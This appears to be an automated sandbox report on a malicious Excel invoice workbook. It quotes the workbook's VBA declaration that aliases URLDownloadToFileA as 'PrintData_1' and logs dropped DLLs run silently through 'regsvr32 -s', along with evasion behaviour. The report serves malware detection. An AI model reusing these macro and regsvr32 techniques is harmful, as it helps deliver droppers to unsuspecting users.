Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare PtrSafe Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As LongPtr, ByVal lpfnCB As LongPtr ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Declare Function PrintData_1 Lib "urlmon" Alias "URLDownloadToFileA" ( ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long ) As Long

Found Excel 4.0 Macro with suspicious formulas

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: CALL

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76D20000 page execute and read and write

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	OLE, VBA macro line: Private Sub World_time_Print_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function World_time_Print_Layout			Name: World_time_Print_Layout

Document contains embedded VBA macros

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal100.expl.evad.winXLSM@31/24@6/9

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$1_Total New Invoices-Thursday January 21_2021.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE3D9.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Virustotal: Detection: 27%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/media/image3.png
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: 1_Total New Invoices-Thursday January 21_2021.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Initial sample: OLE summary subject = by C.H. Robinson

Source: 1_Total New Invoices-Thursday January 21_2021.xlsm

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Registers a DLL

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\nnmumzom.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\kxwni.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\sxzjqf.dll	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zip	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rar	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rar	Jump to dropped file

Is looking for software installed on the system

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key enumerated: More than 470 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1796	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -159000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -138000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -290000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -263000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -137000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -122000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -135000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -175000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -243000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -399000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -179000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -650000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -332000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -142000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -169000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -468000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -125000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -132000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -321000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -294000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -141000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -167000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -151000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -309000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -157000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -322000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -267000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -336000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -139000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -171000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -276000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724	Thread sleep time: -165000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -426000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -166000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -302000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -143000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456	Thread sleep time: -264000s >= -30000s	Jump to behavior
